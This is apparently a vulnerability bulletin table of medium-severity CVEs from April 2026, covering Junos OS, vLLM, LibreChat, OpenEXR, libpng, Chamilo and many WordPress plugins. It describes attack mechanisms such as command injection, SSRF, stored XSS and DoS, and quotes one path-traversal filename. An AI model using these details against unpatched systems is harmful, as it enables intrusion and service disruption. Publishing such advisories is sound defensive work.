| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX and QFX Series devices allows an unauthenticated, adjacent attacker to cause a complete Denial of Service (DoS). On EX4k and QFX5k platforms configured as service-provider edge devices, if L2PT is enabled on the UNI and VSTP is enabled on the NNI in VXLAN scenarios, receiving VSTP BPDUs on the UNI leads to packet buffer allocation failures, so the device no longer passes traffic until it is manually recovered with a restart. This issue affects Junos OS: * 24.4 releases before 24.4R2, * 25.2 releases before 25.2R1-S1, 25.2R2. This issue does not affect Junos OS releases before 24.4R1. | 2026-04-09 | 6.5 | CVE-2026-33781 | https://kb.juniper.net/JSA107869 |
| Juniper Networks--Junos OS | A Missing Release of Memory after Effective Lifetime vulnerability in the DHCP daemon (jdhcpd) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a memory leak that will eventually cause a complete Denial-of-Service (DoS). In a DHCPv6 over PPPoE, or DHCPv6 over VLAN with Active lease query or Bulk lease query scenario, every subscriber logout leaks a small amount of memory. When all available memory has been exhausted, jdhcpd will crash and restart, which causes a complete service impact until the process has recovered. The memory usage of jdhcpd can be monitored with: user@host> show system processes extensive | match jdhcpd This issue affects Junos OS: * all versions before 22.4R3-S1, * 23.2 versions before 23.2R2, * 23.4 versions before 23.4R2. | 2026-04-09 | 6.5 | CVE-2026-33782 | https://kb.juniper.net/JSA107820 |
| Juniper Networks--Junos OS Evolved | A Function Call With Incorrect Argument Type vulnerability in the sensor interface of Juniper Networks Junos OS Evolved on PTX Series allows a network-based, authenticated attacker with low privileges to cause a complete Denial of Service (DoS). If colored SRTE policy tunnels are provisioned via PCEP, and gRPC is used to monitor traffic in these tunnels, evo-aftmand crashes and doesn't restart which leads to a complete and persistent service impact. The system has to be manually restarted to recover. The issue is seen only when the Originator ASN field in PCEP contains a value larger than 65,535 (32-bit ASN). The issue is not reproducible when SRTE policy tunnels are statically configured. This issue affects Junos OS Evolved on PTX Series: * all versions before 22.4R3-S9-EVO, * 23.2 versions before 23.2R2-S6-EVO, * 23.4 versions before 23.4R2-S7-EVO, * 24.2 versions before 24.2R2-S4-EVO, * 24.4 versions before 24.4R2-S2-EVO, * 25.2 versions before 25.2R1-S2-EVO, 25.2R2-EVO. | 2026-04-09 | 6.5 | CVE-2026-33783 | https://kb.juniper.net/JSA107870 |
| Juniper Networks--Junos OS | An OS Command Injection vulnerability in the CLI processing of Juniper Networks Junos OS and Junos OS Evolved allows a local, high-privileged attacker executing specific, crafted CLI commands to inject arbitrary shell commands as root, leading to a complete compromise of the system. Certain 'set system' commands, when executed with crafted arguments, are not properly sanitized, allowing for arbitrary shell injection. These shell commands are executed as root, potentially allowing for complete control of the vulnerable system. This issue affects: Junos OS: * all versions before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S7, * from 24.2 before 24.2R2-S2, * from 24.4 before 24.4R2, * from 25.2 before 25.2R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-S7-EVO, * from 24.2 before 24.2R2-S2-EVO, * from 24.4 before 24.4R2-EVO, * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO. | 2026-04-09 | 6.7 | CVE-2026-33791 | https://kb.juniper.net/JSA107875 |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Prior to 0.8.4, LibreChat trusts the name field returned by the execute_code sandbox when persisting code-generated artifacts. On deployments using the default local file strategy, a malicious artifact filename containing traversal sequences (for example, ../../../../../app/client/dist/poc.txt) is concatenated into the server-side destination path and written with fs.writeFileSync() without sanitization. This gives any user who can trigger execute_code an arbitrary file write primitive as the LibreChat server user. This vulnerability is fixed in 0.8.4. | 2026-04-07 | 6.3 | CVE-2026-34371 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-qrm5-r67f-6692 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.4.0 to before 3.4.9, a missing bounds check on the dataWindow attribute in EXR file headers allows an attacker to trigger a signed integer overflow in generic_unpack(). By setting dataWindow.min.x to a large negative value, OpenEXRCore computes an enormous image width, which is later used in a signed integer multiplication that overflows, causing the process to terminate with SIGILL via UBSan. This vulnerability is fixed in 3.4.9. | 2026-04-06 | 6.5 | CVE-2026-34378 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-v76p-4qvv-vh4g https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From 0.7.0 to before 0.19.0, the VideoMediaIO.load_base64() method at vllm/multimodal/media/video.py splits video/jpeg data URLs by comma to extract individual JPEG frames, but does not enforce a frame count limit. The num_frames parameter (default: 32), which is enforced by the load_bytes() code path, is completely bypassed in the video/jpeg base64 path. An attacker can send a single API request containing thousands of comma-separated base64-encoded JPEG frames, causing the server to decode all frames into memory and crash with OOM. This vulnerability is fixed in 0.19.0. | 2026-04-06 | 6.5 | CVE-2026-34755 | https://github.com/vllm-project/vllm/security/advisories/GHSA-pq5c-rjhq-qp7p |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.19.0, a Denial of Service vulnerability exists in the vLLM OpenAI-compatible API server. Due to the lack of an upper bound validation on the n parameter in the ChatCompletionRequest and CompletionRequest Pydantic models, an unauthenticated attacker can send a single HTTP request with an astronomically large n value. This completely blocks the Python asyncio event loop and causes immediate Out-Of-Memory crashes by allocating millions of request object copies in the heap before the request even reaches the scheduling queue. This vulnerability is fixed in 0.19.0. | 2026-04-06 | 6.5 | CVE-2026-34756 | https://github.com/vllm-project/vllm/security/advisories/GHSA-3mwp-wvh9-7528 https://github.com/vllm-project/vllm/pull/37952 https://github.com/vllm-project/vllm/commit/b111f8a61f100fdca08706f41f29ef3548de7380 |
| electron--electron | Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, when a renderer calls window.open() with a target name, Electron did not correctly scope the named-window lookup to the opener's browsing context group. A renderer could navigate an existing child window that was opened by a different, unrelated renderer if both used the same target name. If that existing child was created with more permissive webPreferences (via setWindowOpenHandler's overrideBrowserWindowOptions), content loaded by the second renderer inherits those permissions. Apps are only affected if they open multiple top-level windows with differing trust levels and use setWindowOpenHandler to grant child windows elevated webPreferences such as a privileged preload script. Apps that do not elevate child window privileges, or that use a single top-level window, are not affected. Apps that additionally grant nodeIntegration: true or sandbox: false to child windows (contrary to the security recommendations) may be exposed to arbitrary code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5. | 2026-04-07 | 6 | CVE-2026-34765 | https://github.com/electron/electron/security/advisories/GHSA-f3pv-wv63-48x8 |
| burlingtonbytes--WP Blockade Visual Page Builder | The WP Blockade plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 0.9.14. The plugin registers an admin_post action hook 'wp-blockade-shortcode-render' that maps to the render_shortcode_preview() function. This function lacks any capability check (current_user_can()) and nonce verification, allowing any authenticated user to execute arbitrary WordPress shortcodes. The function takes a user-supplied 'shortcode' parameter from $_GET, passes it through stripslashes(), and directly executes it via do_shortcode(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes, which could lead to information disclosure, privilege escalation, or other impacts depending on what shortcodes are registered on the site (e.g., shortcodes from other plugins that display sensitive data, perform actions, or include files). | 2026-04-08 | 6.5 | CVE-2026-3480 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3f159aac-092b-4655-9d97-a496ac01738c?source=cve https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L361 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L361 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L112 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L112 |
| David Lingren--Media Library Assistant | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Lingren Media Library Assistant allows Stored XSS. This issue affects Media Library Assistant: from n/a through 3.34. | 2026-04-06 | 6.5 | CVE-2026-34897 | https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Red Hat--mirror registry for Red Hat OpenShift | A flaw was found in the OpenShift Mirror Registry. This vulnerability allows an unauthenticated, remote attacker to enumerate valid usernames and email addresses via different error messages during authentication failures and account creation. | 2026-04-08 | 5.3 | CVE-2025-14243 | https://access.redhat.com/security/cve/CVE-2025-14243 RHBZ#2419829 |
| inisev--BackupBliss Backup & Migration with Free Cloud Storage | The Backup Migration plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.0.0. This is due to a missing capability check on the 'initializeOfflineAjax' function and lack of proper nonce verification. The endpoint only validates against hardcoded tokens which are publicly exposed in the plugin's JavaScript. This makes it possible for unauthenticated attackers to trigger the backup upload queue processing, potentially causing unexpected backup transfers to configured cloud storage targets and resource exhaustion. | 2026-04-07 | 5.3 | CVE-2025-14944 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=cve https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29 https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#L112 https://plugins.trac.wordpress.org/changeset?old=3386897&old_path=backup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3449635&new_path=backup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php |
| johanaarstein--AM LottiePlayer | The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded SVG files in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 5.4 | CVE-2025-1794 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ef2f1ad1-1e2e-4b56-b16c-d87956b142ad?source=cve https://plugins.trac.wordpress.org/browser/am-lottieplayer/tags/3.5.0/includes/upload-thumbnail.php |
| Hitachi--JP1/IT Desktop Management 2 - Manager | Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows. This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13. | 2026-04-07 | 5.5 | CVE-2025-65116 | https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html |
| vsourz1td--Advanced Contact form 7 DB | The Advanced Contact form 7 DB plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.9. This is due to missing or incorrect nonce validation on the 'vsz_cf7_save_setting_callback' function. This makes it possible for unauthenticated attackers to delete form entries via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. | 2026-04-08 | 5.4 | CVE-2026-0811 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88097744-d2f5-4ae5-aa71-0f4a0decd911?source=cve https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-db-admin.php#L885 https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.0.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that in Code Quality reports could have allowed an authenticated user to leak IP addresses of users viewing the report via specially crafted content. | 2026-04-08 | 5.7 | CVE-2026-1516 | HackerOne Bug Bounty Report #3514461 https://gitlab.com/gitlab-org/gitlab/-/work_items/587893 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups | The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hustle_module_converted' AJAX action in all versions up to, and including, 7.8.10.2. This makes it possible for unauthenticated attackers to forge conversion tracking events for any Hustle module, including draft modules that are never displayed to users, thereby manipulating marketing analytics and conversion statistics. | 2026-04-07 | 5.3 | CVE-2026-2263 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32 https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047 https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311 https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11 |
| OCS Inventory--OCS Inventory NG Server | OCS Inventory NG Server version 2.12.3 and prior contain a stored cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript by submitting malicious User-Agent HTTP headers to the /ocsinventory endpoint. Attackers can register rogue agents or craft requests with malicious User-Agent values that are stored without sanitization and rendered with insufficient encoding in the web console, leading to arbitrary JavaScript execution in the browsers of authenticated users viewing the statistics dashboard. | 2026-04-06 | 5.4 | CVE-2026-22675 | https://github.com/OCSInventory-NG/OCSInventory-Server/pull/483 https://github.com/OCSInventory-NG/OCSInventory-Server/commit/78faf2ca8b897141ba4d337d75692ab8e405bd4e https://www.vulncheck.com/advisories/ocs-inventory-ng-server-stored-xss-via-user-agent |
| Volcengine--OpenViking | OpenViking versions prior to 0.3.3 contain a missing authorization vulnerability in the task polling endpoints that allows unauthorized attackers to enumerate or retrieve background task metadata created by other users. Attackers can access the /api/v1/tasks and /api/v1/tasks/{task_id} routes without authentication to expose task type, task status, resource identifiers, archive URIs, result payloads, and error information, potentially causing cross-tenant interference in multi-tenant deployments. | 2026-04-07 | 5.3 | CVE-2026-22680 | https://github.com/volcengine/OpenViking/releases/tag/v0.3.3 https://github.com/volcengine/OpenViking/pull/1182 https://github.com/volcengine/OpenViking/commit/8c1c3f3608364ee0bb0e45f73478771a68aebdf5 https://www.vulncheck.com/advisories/openviking-missing-authorization-via-task-polling |
| HDFGroup--hdf5 | HDF5 is software for managing data. In 1.14.1-2 and earlier, an attacker who can control an h5 file parsed by HDF5 can trigger a write-based heap buffer overflow condition in the H5T__ref_mem_setnull method. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflow against modern operating systems. | 2026-04-10 | 5.5 | CVE-2026-29043 | https://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5g5w-2277 |
| smub--Charitable Donation Plugin for WordPress Fundraising with Recurring Donations & More | The Charitable - Donation Plugin for WordPress - Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 1.8.9.7. This is due to missing cryptographic verification of incoming Stripe webhook events. This makes it possible for unauthenticated attackers to forge payment_intent.succeeded webhook payloads and mark pending donations as completed without a real payment. | 2026-04-07 | 5.3 | CVE-2026-3177 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve https://plugins.trac.wordpress.org/changeset/3485023/charitable |
| Red Hat--mirror registry for Red Hat OpenShift | A flaw was found in Red Hat Quay's Proxy Cache configuration feature. When an organization administrator configures an upstream registry for proxy caching, Quay makes a network connection to the specified registry hostname without verifying that it points to a legitimate external service. An attacker with organization administrator privileges could supply a crafted hostname to force the Quay server to make requests to internal network services, cloud infrastructure endpoints, or other resources that should not be accessible from the Quay application. | 2026-04-08 | 5.2 | CVE-2026-32591 | https://access.redhat.com/security/cve/CVE-2026-32591 RHBZ#2446965 |
| opensourcepos--opensourcepos | Open Source Point of Sale is a web based point-of-sale application written in PHP using CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Daily Sales management table. The customer_name column is configured with escape: false in the bootstrap-table column configuration, causing customer names to be rendered as raw HTML. An attacker with customer management permissions can inject arbitrary JavaScript into a customer's first_name or last_name field, which executes in the browser of any user viewing the Daily Sales page. This vulnerability is fixed in 3.4.3. | 2026-04-07 | 5.4 | CVE-2026-32712 | https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, a Reflected Cross-Site Scripting (XSS) vulnerability in the exercise question list admin panel allows an attacker to execute arbitrary JavaScript in an authenticated teacher's browser. The pagination code merges all $_GET parameters via array_merge() and outputs the result via http_build_query() directly into HTML href attributes without htmlspecialchars() encoding. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 5.4 | CVE-2026-32893 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc https://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478857592276 |
| Microsoft--Microsoft Edge for Android | User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network. | 2026-04-10 | 5.4 | CVE-2026-33119 | Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability |
| pi-hole--web | Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, configuration values from the /api/config endpoint are placed directly into HTML value="" attributes without escaping in settings-advanced.js, enabling HTML attribute injection. A double quote in any config value breaks out of the attribute context. JavaScript execution is blocked by the server's CSP (script-src 'self'), but injected attributes can alter element styling for UI redressing. The primary attack vector is importing a malicious teleporter backup, which bypasses per-field server-side validation. This vulnerability is fixed in 6.5. | 2026-04-06 | 5.4 | CVE-2026-33406 | https://github.com/pi-hole/web/security/advisories/GHSA-9rfm-c5g6-538p |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized private course enrollment in all versions up to, and including, 3.9.7. This is due to missing post_status validation in the `enroll_now()` and `course_enrollment()` functions. Both enrollment endpoints verify the nonce, user authentication, and whether the course is purchasable, but fail to check if the course has a `private` post_status. This makes it possible for authenticated attackers with Subscriber-level access or above to enroll in private courses by sending a crafted POST request with the target course ID. The enrollment record is created in the database and the private course title and enrollment status are exposed in the subscriber's dashboard, though WordPress core access control prevents the subscriber from viewing the actual course content (returns 404). Enrollment in private courses should be restricted to users with the `read_private_posts` capability. | 2026-04-11 | 5.4 | CVE-2026-3358 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-7228-4253-bb28-2c2e11af76fd?source=cve https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2066 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L134 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2053 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2989 https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8 https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classes/Course.php |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 5.3 | CVE-2026-33705 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57 https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, multiple files use simplexml_load_string() without XXE protection. With LIBXML_NOENT flag, arbitrary server files can be read. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 5.3 | CVE-2026-33737 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j https://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155aba27070c927e https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2ead0d00cacaa3 |
| Juniper Networks--Junos OS | An Incorrect Initialization of Resource vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX Series and QFX Series devices allows an unauthenticated, network-based attacker to cause an integrity impact to downstream networks. When the same family inet or inet6 filter is applied on an IRB interface and on a physical interface as egress filter on EX4100, EX4400, EX4650 and QFX5120 devices, only one of the two filters will be applied, which can lead to traffic being sent out one of these interfaces which should have been blocked. This issue affects Junos OS on EX Series and QFX Series: * 23.4 version 23.4R2-S6, * 24.2 version 24.2R2-S3. No other Junos OS versions are affected. | 2026-04-09 | 5.8 | CVE-2026-33773 | https://kb.juniper.net/JSA107815 |
| Juniper Networks--Junos OS | A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS and Junos OS Evolved allows a local user with low privileges to read sensitive information. A local user with low privileges can execute the CLI command 'show mgd' with specific arguments which will expose sensitive information. This issue affects Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S4, * 24.4 versions before 24.4R2-S1, * 25.2 version before 25.2R1-S2, 25.2R2; Junos OS Evolved: * all versions before 23.2R2-S6-EVO, * 23.4 version before 23.4R2-S6-EVO, * 24.2 version before 24.2R2-S4-EVO, * 24.4 versions before 24.4R2-S1-EVO, * 25.2 versions before 25.2R2-EVO. | 2026-04-09 | 5.5 | CVE-2026-33776 | https://kb.juniper.net/JSA107866 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1600, SRX2300 and SRX4300 allows a local attacker with low privileges to cause a complete Denial of Service (DoS). When a specific 'show chassis' CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again. This issue affects Junos OS on SRX1600, SRX2300 and SRX4300: * 24.4 versions before 24.4R1-S3, 24.4R2. This issue does not affect Junos OS versions before 24.4R1. | 2026-04-09 | 5.5 | CVE-2026-33786 | https://kb.juniper.net/JSA107810 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600 allows a local attacker with low privileges to cause a complete Denial of Service (DoS). When a specific 'show chassis' CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again. This issue affects Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600: * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 versions before 25.2R1-S1, 25.2R2. | 2026-04-09 | 5.5 | CVE-2026-33787 | https://kb.juniper.net/JSA107873 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a signed integer overflow exists in undo_pxr24_impl() in src/lib/OpenEXRCore/internal_pxr24.c at line 377. The expression (uint64_t)(w * 3) computes w * 3 as a signed 32-bit integer before casting to uint64_t. When w is large, this multiplication constitutes undefined behavior under the C standard. On tested builds (clang/gcc without sanitizers), two's-complement wraparound commonly occurs, and for specific values of w the wrapped result is a small positive integer, which may allow the subsequent bounds check to pass incorrectly. If the check is bypassed, the decoding loop proceeds to write pixel data through dout, potentially extending far beyond the allocated output buffer. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. | 2026-04-06 | 5.9 | CVE-2026-34380 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-q3v8-hw4m-59w5 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From 0.16.0 to before 0.19.0, a server-side request forgery (SSRF) vulnerability in download_bytes_from_url allows any actor who can control batch input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS requests from the server, without any URL validation or domain restrictions. This can be used to target internal services (e.g. cloud metadata endpoints or internal HTTP APIs) reachable from the vLLM host. This vulnerability is fixed in 0.19.0. | 2026-04-06 | 5.4 | CVE-2026-34753 | https://github.com/vllm-project/vllm/security/advisories/GHSA-pf3h-qjgv-vcpr |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding setter on the same png_struct/png_info pair causes the setter to read from freed memory and copy its contents into the replacement buffer. The setter frees the internal buffer before copying from the caller-supplied pointer, which now dangles. The freed region may contain stale data (producing silently corrupted chunk metadata) or data from subsequent heap allocations (leaking unrelated heap contents into the chunk struct). This vulnerability is fixed in 1.6.57. | 2026-04-09 | 5.1 | CVE-2026-34757 | https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7-g8h7-v645 https://github.com/pnggroup/libpng/issues/836 https://github.com/pnggroup/libpng/issues/837 https://github.com/pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a https://github.com/pnggroup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc |
| projectzealous01--PZ Frontend Manager | The PZ Frontend Manager plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.6. The pzfm_user_request_action_callback() function, registered via the wp_ajax_pzfm_user_request_action action hook, lacks both capability checks and nonce verification. This function handles user activation, deactivation, and deletion operations. When the 'dataType' parameter is set to 'delete', the function calls wp_delete_user() on all provided user IDs without verifying that the current user has the appropriate permissions. Notably, the similar pzfm_remove_item_callback() function does check pzfm_can_delete_user() before performing deletions, indicating this was an oversight. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary WordPress users (including administrators) by sending a crafted request to the AJAX endpoint. | 2026-04-08 | 5.3 | CVE-2026-3477 | https://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e345-b549-493b-a84b-abe56ab42a04?source=cve https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L331 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L331 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L292 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L292 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L290 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L290 |
| Eniture technology--LTL Freight Quotes Worldwide Express Edition | Missing Authorization vulnerability in Eniture technology LTL Freight Quotes - Worldwide Express Edition allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects LTL Freight Quotes - Worldwide Express Edition: from n/a through 5.2.1. | 2026-04-07 | 5.3 | CVE-2026-34899 | https://patchstack.com/database/wordpress/plugin/ltl-freight-quotes-worldwide-express-edition/vulnerability/wordpress-ltl-freight-quotes-worldwide-express-edition-plugin-5-2-1-broken-access-control-vulnerability?_s_id=cve |
| OceanWP--Ocean Extra | Missing Authorization vulnerability in OceanWP Ocean Extra allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ocean Extra: from n/a through 2.5.3. | 2026-04-07 | 5.4 | CVE-2026-34903 | https://patchstack.com/database/wordpress/plugin/ocean-extra/vulnerability/wordpress-ocean-extra-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve |
